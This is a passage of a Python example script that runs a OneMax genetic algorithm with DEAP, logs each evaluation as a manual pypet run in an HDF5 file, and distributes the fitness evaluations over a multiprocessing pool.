except ImportError:
# For Python 3
izip = zip
from deap import base
from deap import creator
from deap import tools
from pypet import Trajectory, cartesian_product, manual_run, MultiprocContext
@manual_run(store_meta_data=True)  # Required for executing single runs manually (no Environment)
def eval_one_max(traj, individual):
    """OneMax fitness function.

    Stores the evaluated individual and its fitness (the number of ones)
    as results of the current run and returns the fitness to DEAP.
    """
    score = sum(individual)
    traj.f_add_result('$set.$.individual', list(individual))
    traj.f_add_result('$set.$.fitness', score)
    traj.f_store()
    return (score,)  # DEAP expects fitness values as a tuple!
def eval_wrapper(the_tuple):
    """Unpack a single ``(traj, individual)`` tuple into arguments for
    :func:`eval_one_max` and return its fitness tuple.

    The pool's ``map`` function only accepts a single iterable, so the
    caller zips trajectory copies and individuals together first and this
    wrapper unpacks each pair again.
    """
    return eval_one_max(*the_tuple)
def main():
    """Run a OneMax genetic algorithm, tracking every evaluation with pypet.

    Builds a :class:`~pypet.Trajectory` by hand (no ``Environment``),
    registers the DEAP operators, and evolves a population for
    ``NGEN`` generations. Each individual evaluation is executed as a
    manual pypet run distributed over a multiprocessing pool.
    """
    # No environment here ;-) -- the trajectory is created and stored manually.
    filename = os.path.join('experiments', 'example_20.hdf5')
    traj = Trajectory('onemax', filename=filename, overwrite_file=True)
    # ------- Add parameters ------- #
    traj.f_add_parameter('popsize', 100)
    traj.f_add_parameter('CXPB', 0.5)
    traj.f_add_parameter('MUTPB', 0.2)
    traj.f_add_parameter('NGEN', 20)
    traj.f_add_parameter('generation', 0)
    traj.f_add_parameter('ind_idx', 0)
    traj.f_add_parameter('ind_len', 50)
    traj.f_add_parameter('indpb', 0.005)
    traj.f_add_parameter('tournsize', 3)
    traj.f_add_parameter('seed', 42)
    traj.f_store(only_init=True)
    # ------- Create and register functions with DEAP ------- #
    creator.create("FitnessMax", base.Fitness, weights=(1.0,))
    creator.create("Individual", list, fitness=creator.FitnessMax)
    toolbox = base.Toolbox()
    # Attribute generator: each gene is a random bit.
    toolbox.register("attr_bool", random.randint, 0, 1)
    # Structure initializers: an individual is `ind_len` bits, a population
    # is a list of individuals.
    toolbox.register("individual", tools.initRepeat, creator.Individual,
        toolbox.attr_bool, traj.ind_len)
    toolbox.register("population", tools.initRepeat, list, toolbox.individual)
    # Operator registering
    toolbox.register("mate", tools.cxTwoPoint)
    toolbox.register("mutate", tools.mutFlipBit, indpb=traj.indpb)
    toolbox.register("select", tools.selTournament, tournsize=traj.tournsize)
    toolbox.register("evaluate", eval_wrapper)
    pool = multip.Pool(4)
    toolbox.register("map", pool.map)  # We use the pool's map function!
    # ------- Initialize Population -------- #
    random.seed(traj.seed)
    pop = toolbox.population(n=traj.popsize)
    CXPB, MUTPB, NGEN = traj.CXPB, traj.MUTPB, traj.NGEN
    start_idx = 0  # We need to count executed runs across generations
    print("Start of evolution")
    for g in range(traj.NGEN):
        print("-- Generation %i --" % g)
        # Determine individuals that need to be evaluated
        # (only those whose fitness was invalidated or never set).
        eval_pop = [ind for ind in pop if not ind.fitness.valid]
        # Add as many explored runs as individuals that need to be evaluated
        traj.f_expand(cartesian_product({'generation': [g], 'ind_idx': range(len(eval_pop))}))
        # We need to make the storage service multiprocessing safe
        mc = MultiprocContext(traj, wrap_mode='QUEUE')
        mc.f_start()
        # Create a single iterable to be passed to our fitness function (wrapper).
        # `yields='copy'` is important, the pool's `map` function will
        # go over the whole iterator at once and store it in memory.
        # So for every run we need a copy of the trajectory.
        # Alternatively, you could use `yields='self'` and use the pool's `imap` function.
        zip_iterable = izip(traj.f_iter_runs(start_idx, yields='copy'), eval_pop)
        fitnesses = toolbox.map(eval_wrapper, zip_iterable)
        # fitnesses is just a list of tuples [(fitness,), ...]
        for idx, fitness in enumerate(fitnesses):
            # Update fitnesses
            eval_pop[idx].fitness.values = fitness
        # Finalize the multiproc wrapper
        mc.f_finalize()
        # Update start index so the next generation's runs pick up where we left off
        start_idx += len(eval_pop)
        print(" Evaluated %i individuals" % len(eval_pop))
        # Gather all the fitnesses in one list and print the stats
        fits = [ind.fitness.values[0] for ind in pop]
        length = len(pop)
        mean = sum(fits) / length
        sum2 = sum(x*x for x in fits)
        # Population standard deviation: sqrt(E[x^2] - E[x]^2)
        std = abs(sum2 / length - mean**2)**0.5
        print(" Min %s" % min(fits))
        print(" Max %s" % max(fits))
        print(" Avg %s" % mean)
        print(" Std %s" % std)
        # ------- Create the next generation by crossover and mutation -------- #
        if g < traj.NGEN -1:  # not necessary for the last generation
            # Select the next generation individuals
            offspring = toolbox.select(pop, len(pop))
            # Clone the selected individuals
            offspring = list(map(toolbox.clone, offspring))
            # Apply crossover and mutation on the offspring;
            # deleting fitness.values marks a child for re-evaluation.
            for child1, child2 in zip(offspring[::2], offspring[1::2]):
                if random.random() < CXPB:
                    toolbox.mate(child1, child2)
                    del child1.fitness.values
                    del child2.fitness.values
            for mutant in offspring:
                if random.random() < MUTPB:
                    toolbox.mutate(mutant)
                    del mutant.fitness.values
            # The population is entirely replaced by the offspring
            pop[:] = offspring
    # Stop the multiprocessing pool
    pool.close()
    pool.join()
    print("-- End of (successful) evolution --")
    best_ind = tools.selBest(pop, 1)[0]
    print("Best individual is %s, %s" % (best_ind, best_ind.fitness.values))
    traj.f_store()  # And store all the rest of the data
# Script entry point: run the full GA optimization only when executed directly.
if __name__ == "__main__":
    main()
"robert.meyer@ni.tu-berlin.de"
] | robert.meyer@ni.tu-berlin.de |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.